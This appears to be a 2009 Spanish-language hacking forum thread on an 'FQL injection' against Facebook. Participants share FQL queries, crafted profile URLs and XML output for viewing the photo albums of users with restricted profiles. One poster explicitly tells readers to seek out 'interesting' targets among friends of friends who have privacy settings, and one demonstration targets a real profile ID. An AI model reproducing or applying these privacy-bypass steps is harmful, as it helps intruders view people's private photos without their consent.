FQL Injection (?)

Iniciado por Tryptophan, 13 Marzo 2009, 06:20 AM

0 Miembros y 1 Visitante están viendo este tema.

Littlehorse

Claro, yo llego a lo mismo pero en Español XD
An expert is a man who has made all the mistakes which can be made, in a very narrow field.

Krackwar ™

WHK es mas u17r4m4573r31337 que yo



El error mas grande de el mundo es decir que el ser humano es inteligente.

Facismo , antifacismo , etc.. la misma mierda ..
Soy el-> http://tinyurl.com/fantasma-de-krackwar
Código (asm) [Seleccionar]

mov ecx,1000
Etiqueta:
invoke printf,"No Copiare en clases"
loop Etiq

Littlehorse

An expert is a man who has made all the mistakes which can be made, in a very narrow field.

sirdarckcat

Pongan esto:
Código (sql) [Seleccionar]
SELECT link FROM album WHERE owner=532437297
aca:
http://developers.facebook.com/tools.php

El link que sale es este:
http://www.facebook.com/album.php?aid=63080&id=532437297

Entran y ven el album.. necesitan tener cuenta en facebook.

Saludos!!

toxeek


Que tal.

A ver.. yo uso el Method photos.getAlbums.
Tras ello, en el callback pongo lo citado.

Pero este "bug" deberia de servir para aquellas personas que no son tus amigos, y tienen restricciones puestas para ver su album/perfil.
Mucho me temo que se este probando con personas con el perfil abierto.

Como digo, yo haciendolo asi recibo esa pagina de error..


Saludos.
"La envidia es una declaración de inferioridad"
Napoleón.

Novlucker

El problema debe de estar aquí  :P
Esta url genera confusión, o bueno, a mi me la generó  :-X
http://www.facebook.com/profile.php?id=MIID&v=photos&viewas=MIID#/album.php?aid=yyyyyyy&id=MIID

Así esta mejor:
http://www.facebook.com/profile.php?id=IDUsuario&v=photos&viewas=MIID#/album.php?aid=yyyyyyy&id=IDUsuario

Al principio ponía Mi ID en todos los campos donde lo decía, pero resulta que el primero y el último son del usuario "victima", solo en el del medio hay que poner la nuestra, y si estaban haciendo esto les debería de decir que "no estaba disponible"  :P

Saludos
Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD

"Hay dos cosas infinitas: el Universo y la estupidez  humana. Y de la primera no estoy muy seguro."
Albert Einstein

toxeek

Que tal.

A ver, los que dicen que pueden, pueden hacer algo?
Busquen entre los amigos de sus amigos alguien que no tenga el hypervinculo activado en su nombre ( esto denotara que tiene impuestas restricciones para ver su perfil, y estos son los INTERESANTES ).
Tras ello pues hagan SOLO un click en su foto, y posen el puntero del raton sobre el link como para mandarles un mensaje.
Con el puntero posado, en la parte inferior ( informativa de links ) del Browser podremos obtener su ID.

Bien, tras ello hacemos todo el proceso con la API como se ha citado, para hacernos con el aid.

Pueden ver el album de esa persona??


Suerte.
"La envidia es una declaración de inferioridad"
Napoleón.

EvilGoblin

Sip ... verdaderamente bueno ^_^ pero veo muchas opciones.. quizas tenga otras cosas para jugar  =D


^^
Experimental Serial Lain [Linux User]

sirdarckcat

#18
Miren, otro ejemplo:
http://www.facebook.com/profile.php?id=4 (el creador de facebook, perfil privado)

Código (sql) [Seleccionar]
SELECT link FROM album WHERE owner=4

Código (xml) [Seleccionar]
<?xml version="1.0" encoding="UTF-8"?>

<fql_query_response xmlns="http://api.facebook.com/1.0/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" list="true">

  <album>

    <link>http://www.facebook.com/album.php?aid=2204760&amp;id=4</link>

  </album>

  <album>

    <link>http://www.facebook.com/album.php?aid=2047231&amp;id=4</link>

  </album>

  <album>

    <link>http://www.facebook.com/album.php?aid=2034080&amp;id=4</link>

  </album>

  <album>

    <link>http://www.facebook.com/album.php?aid=2002684&amp;id=4</link>

  </album>

</fql_query_response>



Funciona ;)


Saludos!!

sirdarckcat

Ahhh ya vi su error XDDD

Estaban poniendo &amp; en el link jajaja.. deben cambiar &amp; por &, porque XML convierte chars como & a su entidad en HTML.

Saludos!!